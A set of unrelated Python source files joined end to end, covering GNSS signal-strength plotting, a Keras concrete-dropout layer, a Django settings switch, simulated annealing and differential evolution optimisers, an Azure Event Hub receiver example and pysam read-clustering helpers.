fecha_morning_last = fecha_morning_last.to_pydatetime()
# Get the PRNs
PRNs = self.extract_prns(const, freq)
# Append SBAS PRNs for GPS const
if const=='G': PRNs = self._append_sbas_prns(freq, PRNs)
# Define the A4 page dimentions (landscape)
fig_width_cm = 29.7
fig_height_cm = 21
inches_per_cm = 1 / 2.54 # Convert cm to inches
fig_width = fig_width_cm * inches_per_cm # width in inches
fig_height = fig_height_cm * inches_per_cm # height in inches
fig_size = [fig_width, fig_height]
# Create the figure with the subplots
n_plots = len(PRNs) + len(PRNs)%2 # Number of subplots with data (even number)
n_rows = 6 # Number of available rows p/ page
n_cols = 2 # Number of available columns p/ page
hratios = [1]*n_rows
n_plots_left = n_plots
q = 0
while n_plots_left > 0:
# Determine the number of subplots in the figure
if (n_plots_left//(n_rows*n_cols)) > 0:
q += 1
n_plots2 = n_rows*n_cols
PRNs_section = PRNs[:n_rows*n_cols]
PRNs = PRNs[n_rows*n_cols:]
else:
n_plots2 = n_plots_left
PRNs_section = PRNs
# Plot
fig, axs = plt.subplots(n_rows, n_cols, figsize=fig_size, sharex=False, sharey="row",
gridspec_kw={'hspace': 0, 'wspace': 0, 'height_ratios':hratios})
j = 0
for ax in axs.reshape(-1): # Plot from left to right, rather than top to bottom
if j < n_plots_left: # Plot
# ax -> CN0
# ax2 -> elevation
ax2 = ax.twinx()
# Plot CN0 & elevation data
if j < len(PRNs_section):
# Plot s4 info
prn_value = PRNs_section[j]
# -> Get the correct freq for SBAS const, appended to GPS plots
if const=='G' and prn_value[0]=='S':
freq_n = self._convert_GPS2SBAS_frequency(freq)
else: freq_n = freq
color1 = "blue" # This color is used in y axis labels, ticks and border
colors1 = ["cornflowerblue", "navy"] # These colors are used for the plot lines
for k in range(2):
df3_cn0 = self.get_variable(prn_value, var=freq_n+f"_{k+1}")
ax.plot(df3_cn0.index, df3_cn0.values, '.', color=colors1[k], markersize=2)
# Plot the strip day/night
ax.set_facecolor(color="lightgrey")
ax.axvspan(fecha_morning_first, fecha_morning_last, color="white") # strip morning/night
# Plot elevation info
df2_elev = self.get_variable(prn_value, var="Elev")
color2 = "orange"
ax2.plot(df2_elev.index, df2_elev.values, '.', color=color2, markersize=1)
# Annotate the prn in the subplot
x_location = fecha2 + pd.Timedelta(minutes=30)
ax2.text(x_location, 35, self._convert2SVID(prn_value), fontsize=15, weight='roman') # 0.375
# Set axis limits
ax.set_xlim([fecha2, fecha2_tomorrow])
ax.set_ylim([0,80]) # CN0 (dB-Hz)
ax2.set_ylim([0,90]) # Elevation angle (º)
# Set ticks and tick labels
# -> Set y axis format, labels odds subplots only
len_half_ax = len(axs.T.reshape(-1))/2
if j%2 == 1: # change only for the 2nd column
# Set y labels only to even subplots
ax.yaxis.set_minor_locator(AutoMinorLocator(4))
ax.set_yticks([0,80])
ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
ax2.set_yticks([0,90])
if j%4 == 1: # subsequent subplot
ax.set_yticklabels([0,80])
ax2.set_yticklabels([0,90])
else:
ax.set_yticklabels(['',''])
ax2.set_yticklabels(['',''])
# Set yellow color to the right y axis
for axis in ['top','bottom','left']:
ax.spines[axis].set_linewidth(2)
ax2.spines[axis].set_linewidth(2)
ax.spines['right'].set_color(color2)
ax.spines['right'].set_linewidth(2)
ax2.spines['right'].set_color(color2)
ax2.spines['right'].set_linewidth(2)
ax2.tick_params(axis='y', which='both', colors=color2)
else: # apply some changes to the 1st column
# remove y tick labels for elevation
ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
ax2.set_yticks([0,90])
ax2.set_yticklabels(['',''])
# set linewidth to top, bottom and right borders of the subplot
for axis in ['top','bottom','right']:
ax.spines[axis].set_linewidth(2)
ax2.spines[axis].set_linewidth(2)
# Set blue color to the left y axis
ax.spines['left'].set_color(color1)
ax.spines['left'].set_linewidth(2)
ax2.spines['left'].set_color(color1)
ax2.spines['left'].set_linewidth(2)
ax.tick_params(axis='y', which='both', colors=color1)
# -> Set x axis format
hours = mdates.HourLocator(interval = 2)
ax.xaxis.set_major_locator(hours) # ticks interval: 2h
#ax.xaxis.set_major_locator(NullLocator()) # ticks interval: 2h
ax.xaxis.set_minor_locator(AutoMinorLocator(2)) # minor tick division: 2
myFmt = DateFormatter("%H")
ax.xaxis.set_major_formatter(myFmt) # x format: hours
# -> set the ticks style
ax.xaxis.set_tick_params(width=2, length=8, which='major', direction='out')
ax.xaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
ax.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
ax.yaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
ax2.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
ax2.yaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
# -> set the label ticks
ax.tick_params(axis='x', which='major', labelsize=12)
ax.tick_params(axis='y', labelsize=12)
ax2.tick_params(axis='y', labelsize=12)
if j == (n_plots2-1): # lower right: stay label xticks
pass
elif j == (n_plots2-2): # lower left: stay label xticks
pass
else: # hide label xticks
ax.tick_params(axis='x', which='major', labelsize=12, labelbottom='off')
# Set grid
ax.grid(which='major', axis='both', ls=':', linewidth=1.2)
ax.grid(which='minor', axis='both', ls=':', alpha=0.5)
# Set title and axis labels
aux = self.get_freq_name(const, int(freq[-1]))
frequency_name = aux["name"]
frequency_value = aux["value"] + "MHz"
# -> Title
if j == 0: # Subplot on Upper left
fig.text(0, 1, fecha3, ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
fig.text(0.42, 1, self.get_station_name(), ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
if j == 1: # Subplot on Upper right
fig.text(0, 1.3, 'Amplitude', ha='center', va='bottom', fontsize=19, weight='semibold', transform=ax.transAxes)
fig.text(0.3, 1, frequency_value, ha='center', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
fig.text(1, 1, f"{frequency_name} | {self.get_const_name(const)}", ha='right', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
# -> Labels
if j == n_plots2-1: # x axis label, Subplot on Lower right
fig.text(0, -0.5, 'Time UTC', ha='center', va='center', fontsize=14, transform=ax.transAxes)
aux_nrows = int(n_plots2/n_cols)
if j == aux_nrows-aux_nrows%2: # y axis label on the left
k = (aux_nrows%2)*0.5
fig.text(-0.1, 1-k, 'C/N0(dB-Hz)', ha='center', va='center', rotation='vertical', fontsize=14, color='b', transform=ax.transAxes)
if j == (aux_nrows+(1-aux_nrows%2)): # y axis label on the right
k = (aux_nrows%2)*0.5
fig.text(1.1, 1-k, 'Elevation Angle($^o$)', ha='center', va='center', rotation=-90, fontsize=14, color=color2, transform=ax.transAxes)
else:
ax.axis('off')
j += 1
# Save figure as pdf
pdf.savefig()
n_plots_left -= j
print(f"Plotted successfully; for const: {const}, and freq: {freq}!")
else:
print(f"There is only Null data; for const: {const}, and freq: {freq}!")
return 'Ok!'
# Plot CN0 vs time, and elevation vs time (PLOT TYPE II)
# Nº subplots/page = 36; Marker = dash ('-'); line's color = blue;
# Top = s4 graphs; PRN names = right side
def plotCN0_2(self, pdf, const='G', freq='CN0_sig1'):
"""
Input:
- pdf: object to save into a pdf file
"""
if self._check_noNull_values(const, freq):
# Get file UTC date
figure_name = self.get_output_figure_name() # e.g. ljic_200926
fecha = figure_name[5:] # e.g. 200926
fecha2 = datetime.datetime.strptime(fecha, "%y%m%d")
fecha3 = datetime.datetime.strftime(fecha2,"%Y/%m/%d")
fecha2_tomorrow = fecha2 + pd.DateOffset(days=1)
fecha2_tomorrow = fecha2_tomorrow.to_pydatetime()
# Get UTC day range, to add a vertical strip
fecha_morning_first = fecha2 + pd.DateOffset(hours=11)
fecha_morning_first = fecha_morning_first.to_pydatetime()
fecha_morning_last = fecha2 + pd.DateOffset(hours=23)
fecha_morning_last = fecha_morning_last.to_pydatetime()
# Get the PRNs
#PRNs = self.extract_prns(const, freq)
PRNs = self.all_prns(const)
# Append SBAS PRNs for GPS const
if const=='G': PRNs = self._append_sbas_prns(freq, PRNs)
# Define the A4 page dimentions (landscape)
fig_width_cm = 29.7
fig_height_cm = 21
inches_per_cm = 1 / 2.54 # Convert cm to inches
fig_width = fig_width_cm * inches_per_cm # width in inches
fig_height = fig_height_cm * inches_per_cm # height in inches
fig_size = [fig_width, fig_height]
# Create the figure with the subplots
n_plots = len(PRNs) + len(PRNs)%2 # Number of subplots with data (even number)
n_rows = 18 # Number of available rows p/ page
n_cols = 2 # Number of available columns p/ page
hratios = [1]*n_rows
n_plots_left = n_plots
q = 0
while n_plots_left > 0:
# Determine the number of subplots in the figure
if (n_plots_left//(n_rows*n_cols)) > 0:
q += 1
n_plots2 = n_rows*n_cols
PRNs_section = PRNs[:n_rows*n_cols]
PRNs = PRNs[n_rows*n_cols:]
else:
n_plots2 = n_plots_left
PRNs_section = PRNs
# Plot
fig, axs = plt.subplots(n_rows, n_cols, figsize=fig_size, sharex=False, sharey=False,
gridspec_kw={'hspace': 0, 'wspace': 0, 'height_ratios':hratios})
j = 0
for ax in axs.reshape(-1): # Plot from left to right, rather than top to bottom
if j < n_plots_left: # Plot
# ax -> elevation
# ax2 -> CN0
ax2 = ax.twinx()
# Change y axis positions
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax2.yaxis.set_label_position("left")
ax2.yaxis.tick_left()
# Plot CN0 & elevation data
if j < len(PRNs_section):
# Plot s4 info
prn_value = PRNs_section[j]
# -> Get the correct freq for SBAS const, appended to GPS plots
if const=='G' and prn_value[0]=='S':
freq_n = self._convert_GPS2SBAS_frequency(freq)
else: freq_n = freq
color1 = "blue" # This color is used in y axis labels, ticks and border
colors1 = ["navy"]*2 #["cornflowerblue", "navy"] # These colors are used for the plot lines
for k in range(2):
df3_cn0 = self.get_variable(prn_value, var=freq_n+f"_{k+1}")
df3_cn0 = df3_cn0.sort_index().asfreq("T") # resampling each minute
ax2.plot(df3_cn0.index, df3_cn0.values, '-', color=colors1[k], markersize=2)
# Plot the strip day/night
ax.set_facecolor(color="lightgrey")
ax.axvspan(fecha_morning_first, fecha_morning_last, color="white") # strip morning/night
# Plot elevation info
df2_elev = self.get_variable(prn_value, var="Elev")
df2_elev = df2_elev.sort_index().asfreq("T") # Resampling each minute
color2 = "orange"
ax.plot(df2_elev.index, df2_elev.values, '-', color=color2, markersize=1)
# Annotate the prn in the subplot
x_location = fecha2 + pd.Timedelta(hours=21, minutes=30)
ax.text(x_location, 51, self._convert2SVID(prn_value), fontsize=12, weight='roman') # 0.375
# Set axis limits
ax.set_xlim([fecha2, fecha2_tomorrow])
ax.set_ylim([0,90]) # Elevation angle (º)
ax2.set_ylim([0,80]) # CN0 (dB-Hz)
ax.yaxis.set_minor_locator(AutoMinorLocator(4))
ax.set_yticks([0,90])
ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
ax2.set_yticks([0,80])
if j%2 == 0: # first column
ax.set_yticklabels(['',''])
if j%4 == 0:
ax2.set_yticklabels([0,80])
else:
ax2.set_yticklabels(['',''])
# set linewidth to top, bottom and right borders of the subplot
for axis in ['top','bottom','right','left']:
ax.spines[axis].set_linewidth(2)
ax2.spines[axis].set_linewidth(2)
# set color for left spin
ax2.spines['left'].set_color(color1)
ax2.tick_params(axis='y', which='both', colors=color1) # tick and tick label color
else: # second column
ax2.set_yticklabels(['',''])
if j%4 == 1:
ax.set_yticklabels([0,90])
else:
ax.set_yticklabels(['',''])
# set linewidth to top, bottom and right borders of the subplot
for axis in ['top','bottom','right','left']:
ax.spines[axis].set_linewidth(2)
ax2.spines[axis].set_linewidth(2)
# set color for right spin
ax2.spines['right'].set_color(color2)
ax.tick_params(axis='y', which='both', colors=color2) # tick and tick label color
# -> Set x axis format
hours = mdates.HourLocator(interval = 2)
ax.xaxis.set_major_locator(hours) # ticks interval: 2h
#ax.xaxis.set_major_locator(NullLocator()) # ticks interval: 2h
ax.xaxis.set_minor_locator(AutoMinorLocator(2)) # minor tick division: 2
myFmt = DateFormatter("%H")
ax.xaxis.set_major_formatter(myFmt) # x format: hours
# -> set the ticks style
ax.xaxis.set_tick_params(width=2, length=8, which='major', direction='out')
ax.xaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
ax.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
ax.yaxis.set_tick_params(width=1, length=8, which='minor', direction='inout')
ax2.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
ax2.yaxis.set_tick_params(width=1, length=8, which='minor', direction='inout')
# -> set the label ticks
ax.tick_params(axis='x', which='major', labelsize=12)
ax.tick_params(axis='y', labelsize=12)
ax2.tick_params(axis='y', labelsize=12)
if j == (n_plots2-1): # lower right: stay label xticks
pass
elif j == (n_plots2-2): # lower left: stay label xticks
pass
else: # hide label xticks
ax.tick_params(axis='x', which='major', labelsize=12, labelbottom='off')
# Set grid
ax.grid(which='major', axis='both', ls=':', linewidth=1.2)
ax.grid(which='minor', axis='both', ls=':', alpha=0.5)
# Set title and axis labels
aux = self.get_freq_name(const, int(freq[-1]))
frequency_name = aux["name"]
frequency_value = aux["value"] + "MHz"
# -> Title
if j == 0: # Subplot on Upper left
fig.text(0, 1, fecha3, ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
fig.text(0.42, 1, self.get_station_name(), ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
if j == 1: # Subplot on Upper right
fig.text(0, 1.7, 'Amplitude', ha='center', va='bottom', fontsize=19, weight='semibold', transform=ax.transAxes)
fig.text(0.3, 1, frequency_value, ha='center', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
fig.text(1, 1, f"{frequency_name} | {self.get_const_name(const)}", ha='right', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
# -> Labels
if j == n_plots2-1: # x axis label, Subplot on Lower right
fig.text(0, -1.35, 'Time UTC', ha='center', va='center', fontsize=14, transform=ax.transAxes)
aux_nrows = int(n_plots2/n_cols)
if j == aux_nrows-aux_nrows%2: # y axis label on the left
k = (aux_nrows%2)*0.5
fig.text(-0.11, 1-k, 'C/N0(dB-Hz)', ha='center', va='center', rotation='vertical', fontsize=14, color='b', transform=ax.transAxes)
if j == (aux_nrows+(1-aux_nrows%2)): # y axis label on the right
k = (aux_nrows%2)*0.5
fig.text(1.11, 1-k, 'Elevation Angle($^o$)', ha='center', va='center', rotation=-90, fontsize=14, color=color2, transform=ax.transAxes)
else:
ax.axis('off')
j += 1
# Save figure as pdf
pdf.savefig()
n_plots_left -= j
print(f"Plotted successfully; for const: {const}, and freq: {freq}!")
else:
print(f"There is only Null data; for const: {const}, and freq: {freq}!")
return 'Ok!'
|
import tensorflow as tf
from tensorflow.keras import optimizers
from tensorflow.keras.layers import InputSpec, Dense, Wrapper, Input, concatenate
from tensorflow.keras.models import Model
import numpy as np
class ConcreteDropout(Wrapper):
"""This wrapper allows to learn the dropout probability for any given input Dense layer.
```python
# as the first layer in a model
model = Sequential()
model.add(ConcreteDropout(Dense(8), input_shape=(16)))
# now model.output_shape == (None, 8)
# subsequent layers: no need for input_shape
model.add(ConcreteDropout(Dense(32)))
# now model.output_shape == (None, 32)
```
`ConcreteDropout` can be used with arbitrary layers which have 2D
kernels, not just `Dense`. However, Conv2D layers require different
weighing of the regulariser (use SpatialConcreteDropout instead).
# Arguments
layer: a layer instance.
weight_regularizer:
A positive number which satisfies
$weight_regularizer = l**2 / (\tau * N)$
with prior lengthscale l, model precision $\tau$ (inverse observation noise),
and N the number of instances in the dataset.
Note that kernel_regularizer is not needed.
dropout_regularizer:
A positive number which satisfies
$dropout_regularizer = 2 / (\tau * N)$
with model precision $\tau$ (inverse observation noise) and N the number of
instances in the dataset.
Note the relation between dropout_regularizer and weight_regularizer:
$weight_regularizer / dropout_regularizer = l**2 / 2$
with prior lengthscale l. Note also that the factor of two should be
ignored for cross-entropy loss, and used only for the eculedian loss.
"""
def __init__(self, layer, weight_regularizer=0, dropout_regularizer=1e-5,
init_min=0.1, init_max=0.1, is_mc_dropout=True, **kwargs):
assert 'kernel_regularizer' not in kwargs
super(ConcreteDropout, self).__init__(layer, **kwargs)
self.weight_regularizer = weight_regularizer
self.dropout_regularizer = dropout_regularizer
self.is_mc_dropout = is_mc_dropout
self.supports_masking = True
self.p_logit = None
self.init_min = np.log(init_min) - np.log(1. - init_min)
self.init_max = np.log(init_max) - np.log(1. - init_max)
def build(self, input_shape=None):
self.input_spec = InputSpec(shape=input_shape)
if not self.layer.built:
self.layer.build(input_shape)
self.layer.built = True
super(ConcreteDropout, self).build()
# initialise p
self.p_logit = self.add_weight(name='p_logit',
shape=(1,),
initializer=tf.random_uniform_initializer(self.init_min, self.init_max),
dtype=tf.dtypes.float32,
trainable=True)
def compute_output_shape(self, input_shape):
return self.layer.compute_output_shape(input_shape)
def concrete_dropout(self, x, p):
"""
Concrete dropout - used at training time (gradients can be propagated)
:param x: input
:return: approx. dropped out input
"""
eps = 1e-07
temp = 0.1
unif_noise = tf.random.uniform(shape=tf.shape(x))
drop_prob = (
tf.math.log(p + eps)
- tf.math.log(1. - p + eps)
+ tf.math.log(unif_noise + eps)
- tf.math.log(1. - unif_noise + eps)
)
drop_prob = tf.math.sigmoid(drop_prob / temp)
random_tensor = 1. - drop_prob
retain_prob = 1. - p
x *= random_tensor
x /= retain_prob
return x
def call(self, inputs, training=None):
p = tf.math.sigmoid(self.p_logit)
# initialise regulariser / prior KL term
input_dim = inputs.shape[-1] # last dim
weight = self.layer.kernel
kernel_regularizer = self.weight_regularizer * tf.reduce_sum(tf.square(weight)) / (1. - p)
dropout_regularizer = p * tf.math.log(p) + (1. - p) * tf.math.log(1. - p)
dropout_regularizer *= self.dropout_regularizer * input_dim
regularizer = tf.reduce_sum(kernel_regularizer + dropout_regularizer)
if self.is_mc_dropout:
return self.layer.call(self.concrete_dropout(inputs, p)), regularizer
else:
def relaxed_dropped_inputs():
return self.layer.call(self.concrete_dropout(inputs, p)), regularizer
return tf.keras.backend.in_train_phase(relaxed_dropped_inputs,
self.layer.call(inputs),
training=training), regularizer
def mse_loss(true, pred):
n_outputs = pred.shape[1] // 2
mean = pred[:, :n_outputs]
return tf.reduce_mean((true - mean) ** 2, -1)
def heteroscedastic_loss(true, pred):
n_outputs = pred.shape[1] // 2
mean = pred[:, :n_outputs]
log_var = pred[:, n_outputs:]
precision = tf.math.exp(-log_var)
return tf.reduce_sum(precision * (true - mean) ** 2. + log_var, -1)
def make_model(n_features, n_outputs, n_nodes=100, dropout_reg=1e-5, wd=0):
losses = []
inp = Input(shape=(n_features,))
x = inp
x, loss = ConcreteDropout(Dense(n_nodes, activation='relu'),
weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
losses.append(loss)
x, loss = ConcreteDropout(Dense(n_nodes, activation='relu'),
weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
losses.append(loss)
x, loss = ConcreteDropout(Dense(n_nodes, activation='relu'),
weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
losses.append(loss)
mean, loss = ConcreteDropout(Dense(n_outputs), weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
losses.append(loss)
log_var, loss = ConcreteDropout(Dense(n_outputs), weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
losses.append(loss)
out = concatenate([mean, log_var])
model = Model(inp, out)
for loss in losses:
model.add_loss(loss)
model.compile(optimizer=optimizers.Adam(), loss=heteroscedastic_loss, metrics=[mse_loss])
assert len(model.layers[1].trainable_weights) == 3 # kernel, bias, and dropout prob
assert len(model.losses) == 5, f'{len(model.losses)} is not 5' # a loss for each Concrete Dropout layer
return model
|
import socket
#My laptop is name 'Guinsly-thinkpad-lenovo'
if 'guinsly' in socket.gethostname():
from .development import *
from django.core.urlresolvers import reverse_lazy
LOGIN_REDIRECT_URL = reverse_lazy('dashboard')
LOGIN_URL = reverse_lazy('login')
LOGOUT_URL = reverse_lazy('logout')
print('--dev--settings--')
else:
from .production import *
#print('prod--settings')
#this file won't be load in git and in the
|
from __future__ import print_function, division
from lib import *
from run import *
def testcnl(x):
def f(x) : return x**2 + 3*x + 1
def g(x) : return 3*x + 3
return abs(f(x) - g(x))
print(testcnl(-1.39356))
class CurveAndLine(Function):
def cells(i):
return Have(#T = Time(),
x = Aux('x',lo=-4,hi=4,touch=True),
f = Aux("f",obj=lambda st: testcnl(st.x),
goal=lt,lo=-20,hi=20))
class ZDT1(Function):
def f1(i,it):
return it['0']
def f2(i,it):
g = 1 + 9 * sum(it[str(x)] for x in range(30))/30
return g * round(1- sqrt(it['0']/g))
def cells(i):
d =dict(T = Time(),
f1 = Aux("f1",obj=i.f1,goal=lt,lo=0,hi=1),
f2 = Aux("f2",obj=i.f2,goal=lt,lo=0,hi=10))
for x in xrange(30):
d[str(x)] = Aux(str(x),lo=0,hi=1,touch=True)
return Have(**d)
class DTLZ7(Function):
"Has M-1 disconnected regions"
def s(i,it,n): return it[str(n)]
def __init__(i,m=20):
i.m = m # which w eill process as 0 ... i.m - 1
def g(i,it):
return 1 + 9/i.m * sum(i.s(it,x) for x in xrange(0,i.m))
def h(i,it,g):
return i.m - sum([i.s(it,x)/(1+g)*(1+sin(3*pi*i.s(it,x)))
for x in xrange(0,i.m - 1)])
def fn(i,n):
return lambda it:i.f(n,it)
def f(i,n,it):
if n < (i.m - 2) :
return i.s(it,n)
else:
g = i.g(it,)
h = i.h(it,g)
return (1 + g)*h
def cells(i):
d = dict(T=Time())
for x in xrange(i.m):
d[ str(x)]= Aux(str(x),lo=0,hi=1, touch=True)
d["f"+str(x)]= Aux(str(x),lo=0,hi=10, obj = i.fn(x))
return Have(**d)
#tip: every new model is a big deal. new pony to ride. or, at least, to debug
def boolDom(_,fun,it1,e1,it2,e2):
return fun.have.boolDom(it1,it2)
def lessEnergy(_,fun,it1,e1,it2,e2):
return e1 < e2
def contDom(always,fun,it1,e1,it2,e2):
return fun.have.contDom(always.nums,it1,it2)
@setting
def SA(): return o(
p=0.25,
cooling=1,
kmax=1000,
epsilon=0.01,
cxt={},
era=100,
lives=5,
better=lessEnergy,
verbose=False)
def sa(fun,**overrides):
options = the.SA
options += overrides
return sa1(fun,**the.SA)
def sa1(fun, p=None, cooling=None,
kmax=None,epsilon=None, cxt=None, era=None, better=None,
lives=None, verbose=None):
def decs() : return decisions(fun.have,cxt)
def objs(it) : return fun.have.objectives(it)
def log() : return Haves(fun.have)
def goodbye(info) : fyi(info); return now
def fyi(x) : verbose and say(x)
def improving() : return last.above(now,epsilon)
def baseline() :
gen0= [seen(decs())for _ in xrange(era)]
return era ,gen0
def seen(it):
it = objs(it)
now.add(it,k)
always.add(it,k)
e = always.aggregate(it)
now.seen += [(e,it,k)]
return k+1,it, e
k, life, eb = 1, lives, 1e32
now, always = log(), log()
k,frontier = baseline()
last, now = now, log()
#=======================
def p(old,new,t) : return e**((new-old)/(t+1))
def mutant(it) : return mutate(fun.have,it,cxt,p)
k,s,e = seen(decs())
fyi("%4s [%2s] %3s "% (k,life,""))
while True:
info = "."
k,sn,en = seen(mutant(s))
if en < eb:
fyi("\033[7m!\033[m")
sb,eb = sn,en
if en < e:
s,e = sn,en
info = "+"
elif p(e,en,(k/kmax)**(1/cooling)) < r():
s,e = sn, en
info="?"
if k % era:
fyi(info)
else:
life = lives if improving() else life - 1
if eb < epsilon: return goodbye("E %.5f" %eb)
if life < 1 : return goodbye("L")
if k > kmax : return goodbye("K")
fyi("\n%4s [%2s] %.3f %s" % (k,life,eb,info))
last, now = now, log()
# acoid repeated calls to cells
def _sa0():
n = lambda z:z.__name__
what = ZDT1
last = results = None
for opt in [de]:
for better in [lessEnergy,boolDom,contDom]:
print("\n %s : %s " % (opt.__name__,better.__name__))
for seed in [1,2,3,4,5,7,8,9,10]:
fun = what()
rseed(seed)
last = opt(fun,era=50,epsilon=0.001,better=better,verbose=False)
#print(last.scores.ntiles())
for k,v in last.nums.items():
if k[0] == 'f':
print("%s-%s-%s-%s" % (n(what),k,n(opt),n(better)))
for x in v.cache.all: print(" %s" % x)
def _sa1():
# if i added cxt, worse final scores
with study('ZDT1',use(SA,lives=29,kmax=10000,era=100,
epsilon =0.01,p=0.33,cooling=0.1,
verbose=True)):
rseed(1)
s,e=sa(ZDT1(),**the.SA)
#f (0.1009110604332113, [0.101, 0.621, 1.407, 1.933, 2.904], 3.4072182909724873)
#f (0.025561542674170656, [0.026, 0.515, 1.167, 1.881, 7.625], 7.624727551437976)
def _sa2():
# if i added cxt, worse final scores
with study('DTZL',use(SA,lives=9,kmax=10000,era=200,
epsilon=0.01,p=0.33,cooling=0.10,
verbose=True)):
rseed(1)
s,e=sa(DTLZ7(),**the.SA)
print(e)
@setting
def DE(): return o(
f=0.5, cr=0.3, pop=10, kmax=10000,
better=lessEnergy,
epsilon=0.01, cxt={},
lives=9, verbose=False)
def de(fun,**overrides):
options = the.DE
options += overrides
return de1(fun,**options)
def de1(fun, f=None, cr=None, pop=None,
better = None,
kmax=None, epsilon=None, cxt=None, era=None,
lives=None, verbose=None):
def decs() : return decisions(fun.have,cxt)
def objs(it) : return fun.have.objectives(it)
def log() : return Haves(fun.have)
def goodbye(info): fyi(info); return now
def fyi(x) : verbose and say(x)
def improving() : return last.above(now,epsilon)
def baseline() :
gen0= [seen(decs())for k in xrange(era)]
return era ,gen0
def seen(it):
it = objs(it)
now.add(it,k)
always.add(it,k)
e = always.aggregate(it)
now.seen += [(e,it,k)]
return k+1, it,e
k, life, eb = 1, lives, 1e32
now, always = log(),log()
k,frontier = baseline()
last,now= now,log()
#=======================
def any1(): _,it,_ = any(frontier); return it
def mutant(a,b,c):
return crossover(fun.have,a,b,c,f=f,cr=cr,cxt=cxt)
fyi("%4s [%2s] %3s "% (k,life,""))
while True:
info = "."
for pos in xrange(len(frontier)):
info = "."
_,parent,e = frontier[pos]
k,child,en = seen(mutant(any1(),any1(),any1()))
if better(always,fun,child,en,parent,e):
info = "+"
frontier[pos] = k,child,en
if en < eb:
eb = en
info = "\033[7m!\033[m"
if k % era:
fyi(info)
else:
life = lives if improving() else life - 1
if eb < epsilon : return goodbye("E %.5fs" % eb)
if life < 1 : return goodbye("L")
if k > kmax : return goodbye("K")
fyi("\n%4s [%2s] %.3f %s" % (k,life,eb,info))
last, now = now, log()
#smeagin
def _de1():
# if i added cxt, worse final scores
with study('ZDT1',use(DE,verbose=True)):
rseed(1)
e=de(ZDT1(),**the.DE)
print(e)
_sa0()
#_sa1()
#_de1()
|
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
An example to show running concurrent receivers.
"""
import os
import sys
import time
import logging
import asyncio
from azure.eventhub import Offset, EventHubClientAsync, AsyncReceiver
import examples
logger = examples.get_logger(logging.INFO)
# Address can be in either of these formats:
# "amqps://<URL-encoded-SAS-policy>:<URL-encoded-SAS-key>@<mynamespace>.servicebus.windows.net/myeventhub"
# "amqps://<mynamespace>.servicebus.windows.net/myeventhub"
ADDRESS = os.environ.get('EVENT_HUB_ADDRESS')
# SAS policy and key are not required if they are encoded in the URL
USER = os.environ.get('EVENT_HUB_SAS_POLICY')
KEY = os.environ.get('EVENT_HUB_SAS_KEY')
CONSUMER_GROUP = "$default"
OFFSET = Offset("-1")
async def pump(client, partition):
receiver = client.add_async_receiver(CONSUMER_GROUP, partition, OFFSET, prefetch=5)
await client.run_async()
total = 0
start_time = time.time()
for event_data in await receiver.receive(timeout=10):
last_offset = event_data.offset
last_sn = event_data.sequence_number
print("Received: {}, {}".format(last_offset.value, last_sn))
total += 1
end_time = time.time()
run_time = end_time - start_time
print("Received {} messages in {} seconds".format(total, run_time))
try:
if not ADDRESS:
raise ValueError("No EventHubs URL supplied.")
loop = asyncio.get_event_loop()
client = EventHubClientAsync(ADDRESS, debug=False, username=USER, password=KEY)
tasks = [
asyncio.ensure_future(pump(client, "0")),
asyncio.ensure_future(pump(client, "1"))]
loop.run_until_complete(asyncio.wait(tasks))
loop.run_until_complete(client.stop_async())
loop.close()
except KeyboardInterrupt:
pass
|
import pysam,re
import numpy as np
import pandas as pd
from collections import Counter
from operator import itemgetter
NOCLUST = 999
DEFAULTCI= [0.025,0.975] #95%
def addHPtag(inBAM,outBAM,clusterMap,noCluster=NOCLUST,dropNoClust=False):
'''clusterMap is map of {readname:cluster::int}'''
with pysam.AlignmentFile(inBAM) as inbam:
with pysam.AlignmentFile(outBAM,'wb',template=inbam) as outbam:
for rec in inbam:
if rec.query_name not in clusterMap and dropNoClust:
continue
clust = int(clusterMap.get(rec.query_name,noCluster))
rec.set_tag('HP',clust)
outbam.write(rec)
pysam.index(outBAM)
return None
def clusterName(vals):
'vals: (clusterInt,numreads)'
return 'cluster{0[0]}_numreads{0[1]}'.format(vals)
def getCluster(name):
return int(re.search('cluster(\d+)',name).group(1))
def readClusterFile(clustfile,nFields=3):
'''
nFields: use n /-separated fields from input read names in result.
nFields = 0 -> all fields
'''
res = {}
name,cluster = None,None
with open(clustfile) as f:
for line in f:
if line.startswith('>'):
cluster = getCluster(line[1:])
else:
read = '/'.join(line.split('/')[:nFields]) if nFields else line.strip()
res[read] = cluster
return res
def getCounts(seqGen,kmerSize,motifCounter):
counts = {name:[pd.Series(getKmerCounts(seq,k=kmerSize)),
pd.Series(motifCounter(seq))]
for name,seq,qual in seqGen}
kmer,motif = [pd.DataFrame(list(map(itemgetter(i),list(counts.values()))),
index=list(counts.keys())).fillna(0)
for i in [0,1]]
return kmer,motif
def getKmerCounts(seq,k=3):
return Counter(seq[i:i+k] for i in range(0,len(seq)-k+1))
def resampleCI(data,nboot=10000,ci=DEFAULTCI):
n = max(nboot,len(data))
resamp = np.random.choice(data,size=n,replace=True)
